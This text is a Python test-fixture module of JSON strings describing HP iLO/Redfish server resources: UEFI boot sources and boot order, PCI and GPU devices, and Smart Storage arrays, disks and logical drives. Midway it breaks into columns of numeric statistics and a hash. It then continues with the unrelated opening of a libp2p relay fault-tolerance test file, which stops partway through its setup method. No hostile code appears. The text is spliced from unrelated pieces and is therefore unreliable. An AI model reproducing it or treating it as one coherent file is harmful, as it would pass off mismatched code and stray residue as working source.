"href": "/rest/v1/Systems/1"
}
}
}
"""
UEFI_BOOT_DEVICE_ORDER_PXE = ['NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'HD.Slot.1.2',
'Generic.USB.1.1',
'CD.Virtual.2.1',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_HDD = ['HD.Slot.1.2',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'CD.Virtual.2.1',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_CD = ['CD.Virtual.2.1',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'HD.Slot.1.2',
'FD.Virtual.1.1']
UEFI_BOOT_DEVICE_ORDER_ERR = ['FAKE.Virtual.2.1',
'CD.Virtual.2.1',
'NIC.LOM.1.1.IPv4',
'NIC.LOM.1.1.IPv6',
'Generic.USB.1.1',
'HD.Slot.1.2',
'FD.Virtual.1.1']
UEFI_BOOT_SOURCES_ERR = '''
[
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC \
(3863BB43683C,0x0)/IPv4(0.0.0.0)",
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port \
331i Adapter - NIC (PXE IPv4) ",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(3863BB43683C,0x0)/IPv6(0000:0000:0000:0000:\
0000:0000:0000:0000)",
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port \
331i Adapter - NIC (PXE IPv6) ",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)"
},
{
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"BootString": "Generic USB Boot",
"StructuredBootString": "Generic.USB.1.1",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)\
/USB(0x0,0x0)",
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"StructuredBootString": "CD.Virtual.2.1",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
},
{
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x2)/Pci(0x0,0x4)/USB\
(0x1,0x0)",
"BootString": "iLO Virtual USB 1 : HP iLO Virtual USB Key",
"StructuredBootString": "FD.Virtual.1.1",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x2)/Pci(0x0,0x4)/USB(0x1,\
0x0)"
}
]
'''
UEFI_PERS_BOOT_DEVICES = ["HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.iSCSI",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
]
BOOT_PERS_DEV_ORDER_MISSING = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"BootSources": [
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
],
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
UEFI_BootSources = '''
[
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:0)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x0)"
},
{
"BootString": "Slot 1 : Smart Array P840 Controller - 279.37 GiB,\
RAID 0 Logical Drive(Target:0, Lun:1)",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)",
"StructuredBootString": "HD.Slot.1.2",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/Scsi\
(0x0,0x1)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv4",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv4(0.0.0.0)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 2-port\
361i Adapter - NIC (iSCSI IPv4) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.iSCSI",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x3)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x1)/IPv4(0.0.0.0)/iSCSI(iqn.2016-07.org.de\
:storage,0x1,0x0,None,None,None,TCP)"
},
{
"BootString": "Embedded LOM 1 Port 1 : HP Ethernet 1Gb 4-port\
331i Adapter - NIC (PXE IPv6) ",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)",
"StructuredBootString": "NIC.LOM.1.1.IPv6",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1C,0x4)/Pci(0x0,0x0)/MAC\
(C4346BB7EF30,0x0)/IPv6(0000:0000:0000:0000:0000:0000:0000:0000)"
},
{
"BootString": "Generic USB Boot",
"CorrelatableID": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)",
"StructuredBootString": "Generic.USB.1.1",
"UEFIDevicePath": "UsbClass(0xFFFF,0xFFFF,0xFF,0xFF,0xFF)"
},
{
"BootString": "iLO Virtual USB 2 : HP iLO Virtual USB CD/DVD ROM",
"CorrelatableID": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)",
"StructuredBootString": "CD.Virtual.2.1",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x1D,0x0)/USB(0x0,0x0)/USB\
(0x0,0x0)"
}
]
'''
UEFI_BOOTSOURCES_MISSING = """
{
"AttributeRegistry": "HpBiosAttributeRegistryP89.1.1.00",
"DefaultBootOrder": [
"Floppy",
"Cd",
"Usb",
"EmbeddedStorage",
"PcieSlotStorage",
"EmbeddedFlexLOM",
"PcieSlotNic",
"UefiShell"
],
"Description": "This is the Server Boot Order Current Settings",
"DesiredBootDevices": [
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
},
{
"CorrelatableID": "",
"Lun": "",
"Wwn": "",
"iScsiTargetName": ""
}
],
"Modified": "2015-05-26T23:38:24+00:00",
"Name": "Boot Order Current Settings",
"PersistentBootConfigOrder": [
"HD.Slot.1.1",
"HD.Slot.1.2",
"NIC.LOM.1.1.IPv4",
"NIC.LOM.1.1.IPv6",
"Generic.USB.1.1",
"CD.Virtual.2.1"
],
"SettingsResult": {
"ETag": "0DEA61A1609C51EED0628E3B0BC633DD",
"Messages": [
{
"MessageArgs": [
"PersistentBootConfigOrder[0"
],
"MessageID": "Base.1.0:PropertyValueNotInList"
},
{
"MessageArgs": [],
"MessageID": "Base.1.0:Success"
}
],
"Time": "2015-05-14T02:38:40+00:00"
},
"Type": "HpServerBootSettings.1.2.0",
"links": {
"BaseConfigs": {
"href": "/rest/v1/systems/1/bios/Boot/BaseConfigs"
},
"Settings": {
"href": "/rest/v1/systems/1/bios/Boot/Settings"
},
"self": {
"href": "/rest/v1/systems/1/bios/Boot"
}
}
}
"""
PCI_DEVICE_DETAILS_NO_GPU = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/PCIDevices",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/",
"@odata.type": "#HpServerPciDeviceCollection.HpServerPciDeviceCollection",
"Description": " PciDevices view",
"Items": [
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/\
1/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 132,
"ClassCode": 6,
"DeviceID": 34631,
"DeviceInstance": 2,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "PCIe Controller",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.2.1",
"SubclassCode": 4,
"SubsystemDeviceID": 34631,
"SubsystemVendorID": 4277,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x1)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"VendorID": 4277,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
}
"""
PCI_GPU_LIST = """
[
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 5,
"ClassCode": 3,
"DeviceID": 26528,
"DeviceInstance": 3,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "HAWAII XTGL",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.3.1",
"SubclassCode": 128,
"SubsystemDeviceID": 821,
"SubsystemVendorID": 4098,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Pci(0x8,0x0)/Pci(0x0,0x0)",
"VendorID": 4098,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
"""
PCI_DEVICE_DETAILS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/PCIDevices",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/",
"@odata.type": "#HpServerPciDeviceCollection.HpServerPciDeviceCollection",
"Description": " PciDevices view",
"Items": [
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/\
1/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 132,
"ClassCode": 6,
"DeviceID": 34631,
"DeviceInstance": 2,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "PCIe Controller",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.2.1",
"SubclassCode": 4,
"SubsystemDeviceID": 34631,
"SubsystemVendorID": 4277,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x1)/Pci(0x3,0x0)/Pci(0x0,0x0)",
"VendorID": 4277,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
},
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/PCIDevices/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/PCIDevices/6/",
"@odata.type": "#HpServerPciDevice.1.0.0.HpServerPciDevice",
"BusNumber": 5,
"ClassCode": 3,
"DeviceID": 26528,
"DeviceInstance": 3,
"DeviceLocation": "PCI Slot",
"DeviceNumber": 0,
"DeviceSubInstance": 1,
"DeviceType": "Other PCI Device",
"FunctionNumber": 0,
"Id": "6",
"Name": "HAWAII XTGL",
"SegmentNumber": 0,
"StructuredName": "PCI.Slot.3.1",
"SubclassCode": 128,
"SubsystemDeviceID": 821,
"SubsystemVendorID": 4098,
"Type": "HpServerPciDevice.1.0.0",
"UEFIDevicePath": "PciRoot(0x0)/Pci(0x2,0x0)/Pci(0x0,0x0)/\
Pci(0x8,0x0)/Pci(0x0,0x0)",
"VendorID": 4098,
"links": {
"self": {
"href": "/rest/v1/Systems/1/PCIDevices/6"
}
}
}
]
}
"""
STORAGE_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/",
"@odata.type": "#HpSmartStorage.HpSmartStorage",
"Description": "HP Smart Storage",
"Id": "1",
"Links": {
"ArrayControllers": {
"@odata.id": "/redfish/v1/Systems/1\
/SmartStorage/ArrayControllers/"
},
"HostBusAdapters": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage\
/HostBusAdapters/"
}
},
"Name": "HpSmartStorage",
"Status": {
"Health": "OK"
},
"Type": "HpSmartStorage.1.0.0",
"links": {
"ArrayControllers": {
"href": "/rest/v1/Systems/1/SmartStorage\
/ArrayControllers"
},
"HostBusAdapters": {
"href": "/rest/v1/Systems/1/SmartStorage\
/HostBusAdapters"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage"
}
}
}
"""
ARRAY_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/",
"@odata.type": "#HpSmartStorageArrayControllerCollection.\
1.0.0.HpSmartStorageArrayControllerCollection",
"Description": "HP Smart Storage Array Controllers View",
"MemberType": "HpSmartStorageArrayController.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage\
/ArrayControllers/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageArrayControllers",
"Total": 1,
"Type": "Collection.0.9.5",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers"
}
}
}
"""
ARRAY_MEM_SETTINGS = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/0/",
"@odata.type": "#HpSmartStorageArrayController.\
HpSmartStorageArrayController",
"AdapterType": "SmartArray",
"BackupPowerSourceStatus": "Present",
"CacheMemorySizeMiB": 1024,
"CurrentOperatingMode": "RAID",
"Description": "HP Smart Storage Array Controller View",
"FirmwareVersion": {
"Current": {
"VersionString": "2.49"
}
},
"HardwareRevision": "B",
"Id": "0",
"Links": {
"LogicalDrives": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/LogicalDrives/"
},
"PhysicalDrives": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/"
},
"StorageEnclosures": {
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/StorageEnclosures/"
}
},
"Location": "Slot 0",
"LocationFormat": "PCISlot",
"Model": "HP Smart Array P244br Controller",
"Name": "HpSmartStorageArrayController",
"SerialNumber": "PDZVU0FLM7I03I",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"Type": "HpSmartStorageArrayController.1.0.0",
"links": {
"LogicalDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers\
/0/LogicalDrives"
},
"PhysicalDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/DiskDrives"
},
"StorageEnclosures": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/StorageEnclosures"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0"
}
}
}
"""
DISK_COLLECTION = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/2/DiskDrives",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/2/DiskDrives/",
"@odata.type": "\
#HpSmartStorageDiskDriveCollection.HpSmartStorageDiskDriveCollection",
"Description": "HP Smart Storage Disk Drives View",
"MemberType": "HpSmartStorageDiskDrive.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageDiskDrives",
"Total": 1,
"Type": "Collection.1.0.0",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives/0"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers/0/DiskDrives"
}
}
}
"""
DISK_DETAILS_LIST = """
[{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers/Members/0/DiskDrives/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/0/DiskDrives/0/",
"@odata.type": "#HpSmartStorageDiskDrive.HpSmartStorageDiskDrive",
"CapacityMiB": 572325,
"CurrentTemperatureCelsius": 25,
"Description": "HP Smart Storage Disk Drive View",
"EncryptedDrive": "False",
"FirmwareVersion": {
"Current": {
"VersionString": "HPDC"
}
},
"Id": "0",
"InterfaceType": "SAS",
"Location": "1I:1:1",
"LocationFormat": "ControllerPort:Box:Bay",
"MaximumTemperatureCelsius": 34,
"MediaType": "HDD",
"Model": "EG0600FBVFP",
"Name": "HpSmartStorageDiskDrive",
"RotationalSpeedRpm": 10000,
"SerialNumber": "KWK1JS2X",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"Type": "HpSmartStorageDiskDrive.1.0.0",
"links": {
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers\
/0/DiskDrives/0"
}
}
}]
"""
LOGICAL_COLLECTION = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/SmartStorage/\
ArrayControllers/Members/0/LogicalDrives",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/\
0/LogicalDrives/",
"@odata.type": "\
#HpSmartStorageLogicalDriveCollection.HpSmartStorageLogicalDriveCollection",
"Description": "HP Smart Storage Logical Drives View",
"MemberType": "HpSmartStorageLogicalDrive.1",
"Members": [{
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers\
/0/LogicalDrives/0/"
}],
"Members@odata.count": 1,
"Name": "HpSmartStorageLogicalDrives",
"Total": 1,
"Type": "Collection.1.0.0",
"links": {
"Member": [{
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/\
0/LogicalDrives/1"
}],
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0\
/LogicalDrives"
}
}
}
"""
LOGICAL_DETAILS = """
[{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1/SmartStorage/\
ArrayControllers/Members/0/LogicalDrives/Members/$entity",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1/",
"@odata.type": "\
#HpSmartStorageLogicalDrive.1.1.0.HpSmartStorageLogicalDrive",
"CapacityMiB": 286070,
"Description": "HP Smart Storage Logical Drive View",
"Id": "1",
"LogicalDriveEncryption": false,
"LogicalDriveName": "01908CF2PDNMF0ARH6X0FN6FE9",
"LogicalDriveNumber": 1,
"LogicalDriveType": "Data",
"Name": "HpSmartStorageLogicalDrive",
"Raid": "0",
"Status": {
"Health": "OK",
"State": "Enabled"
},
"StripeSizeBytes": 262144,
"Type": "HpSmartStorageLogicalDrive.1.1.0",
"VolumeUniqueIdentifier": "600508B1001CC8A5FF549462C7B8412A",
"links": {
"DataDrives": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1/DataDrives"
},
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/ArrayControllers/0/\
LogicalDrives/1"
}
}
}]
"""
ARRAY_SETTING_NO_CONTROLLER = """
{
"@odata.context": "/redfish/v1/$metadata#Systems/Members/1\
/SmartStorage/ArrayControllers",
"@odata.id": "/redfish/v1/Systems/1/SmartStorage/ArrayControllers/",
"@odata.type": "#HpSmartStorageArrayControllerCollection.\
1.0.0.HpSmartStorageArrayControllerCollection",
"Description": "HP Smart Storage Array Controllers View",
"MemberType": "HpSmartStorageArrayController.1",
"Members@odata.count": 0,
"Name": "HpSmartStorageArrayControllers",
"Total": 0,
"Type": "Collection.0.9.5",
"links": {
"self": {
"href": "/rest/v1/Systems/1/SmartStorage/\
ArrayControllers"
}
}
}
"""
| 31.680112
| 78
| 0.413307
| 9,065
| 146,869
| 6.673028
| 0.106012
| 0.022747
| 0.028434
| 0.025855
| 0.898183
| 0.882792
| 0.869005
| 0.85821
| 0.843911
| 0.82561
| 0
| 0.058466
| 0.444968
| 146,869
| 4,635
| 79
| 31.686947
| 0.6836
| 0.004514
| 0
| 0.674066
| 0
| 0.008352
| 0.975361
| 0.181428
| 0
| 0
| 0.010391
| 0
| 0
| 1
| 0
| false
| 0.003736
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
81b0ad47d38703e2c2e4a33aef3e467eedb19a4b
| 20,402
|
py
|
Python
|
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | 1
|
2021-04-08T17:19:42.000Z
|
2021-04-08T17:19:42.000Z
|
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | null | null | null |
tests/test_packages/test_connections/test_p2p_libp2p/test_fault_tolerance.py
|
devjsc/agents-aea
|
872f7b76cbcd33b6c809905c68681790bb93ff2f
|
[
"Apache-2.0"
] | 1
|
2021-08-05T08:54:25.000Z
|
2021-08-05T08:54:25.000Z
|
# -*- coding: utf-8 -*-
# ------------------------------------------------------------------------------
#
# Copyright 2018-2019 Fetch.AI Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# ------------------------------------------------------------------------------
"""This test module contains resilience and fault tolerance tests for P2PLibp2p connection."""
import os
import shutil
import tempfile
import time
import pytest
from aea.configurations.constants import DEFAULT_LEDGER
from aea.crypto.registries import make_crypto
from aea.mail.base import Envelope
from aea.multiplexer import Multiplexer
from packages.fetchai.connections.p2p_libp2p.check_dependencies import build_node
from packages.fetchai.protocols.default.message import DefaultMessage
from packages.fetchai.protocols.default.serialization import DefaultSerializer
from tests.common.utils import wait_for_condition
from tests.conftest import (
MAX_FLAKY_RERUNS_INTEGRATION,
_make_libp2p_connection,
libp2p_log_on_failure,
libp2p_log_on_failure_all,
)
DEFAULT_PORT = 10234
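# Base port for the test nodes; each connection below listens on DEFAULT_PORT plus a small offset.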
@pytest.mark.flaky(reruns=MAX_FLAKY_RERUNS_INTEGRATION)
class BaseTestLibp2pRelay:
"""Base test class for libp2p connection relay."""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
self.cwd = os.getcwd()
self.t = tempfile.mkdtemp()
os.chdir(self.t)
build_node(self.t)
self.log_files = []
self.multiplexers = []
def change_state_and_wait(
self,
multiplexer: Multiplexer,
expected_is_connected: bool = False,
timeout: int = 10,
) -> None:
"""
Change state of a multiplexer (either connect or disconnect) and wait.
:param multiplexer: the multiplexer to connect/disconnect.
:param expected_is_connected: whether it should be connected or disconnected.
:param timeout: the maximum number of seconds to wait.
:return: None
"""
wait_for_condition(
lambda: multiplexer.is_connected == expected_is_connected, timeout=timeout
)
def teardown(self):
"""Tear down the test"""
for mux in self.multiplexers:
mux.disconnect()
os.chdir(self.cwd)
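# Best-effort cleanup: removing the temp dir can fail (e.g. lingering file handles), so errors are ignored.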
try:
shutil.rmtree(self.t)
except (OSError, IOError):
pass
@libp2p_log_on_failure_all
class TestLibp2pConnectionRelayNodeRestartIncomingEnvelopes(BaseTestLibp2pRelay):
"""Test that connection will reliably receive envelopes after its relay node restarted"""
@libp2p_log_on_failure
def setup(self):
"""Set the test up"""
super().setup()
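# Topology: a genesis node, a relay node that joins via the genesis peer, and
# two non-relay connections that reach the network only through the relay.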
temp_dir_gen = os.path.join(self.t, "temp_dir_gen")
os.mkdir(temp_dir_gen)
self.genesis = _make_libp2p_connection(
data_dir=temp_dir_gen, port=DEFAULT_PORT + 1, build_directory=self.t
)
self.multiplexer_genesis = Multiplexer(
[self.genesis], protocols=[DefaultMessage]
)
self.multiplexer_genesis.connect()
self.log_files.append(self.genesis.node.log_file)
self.multiplexers.append(self.multiplexer_genesis)
genesis_peer = self.genesis.node.multiaddrs[0]
file = "node_key"
make_crypto(DEFAULT_LEDGER).dump(file)
self.relay_key_path = file
temp_dir_rel = os.path.join(self.t, "temp_dir_rel")
os.mkdir(temp_dir_rel)
self.relay = _make_libp2p_connection(
data_dir=temp_dir_rel,
port=DEFAULT_PORT + 2,
entry_peers=[genesis_peer],
node_key_file=self.relay_key_path,
build_directory=self.t,
)
self.multiplexer_relay = Multiplexer([self.relay], protocols=[DefaultMessage])
self.multiplexer_relay.connect()
self.log_files.append(self.relay.node.log_file)
self.multiplexers.append(self.multiplexer_relay)
